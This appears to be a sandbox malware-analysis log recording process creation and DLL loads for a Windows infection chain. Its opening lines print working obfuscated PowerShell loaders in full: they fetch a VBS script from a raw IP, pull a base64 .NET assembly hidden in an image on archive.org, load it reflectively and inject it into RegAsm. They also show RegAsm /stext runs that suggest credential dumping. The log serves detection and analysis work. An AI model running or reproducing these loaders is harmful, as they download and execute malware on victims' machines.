                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lzfstnomboxo"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wcklufzfxwpbazt"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87A7.tmp" "c:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
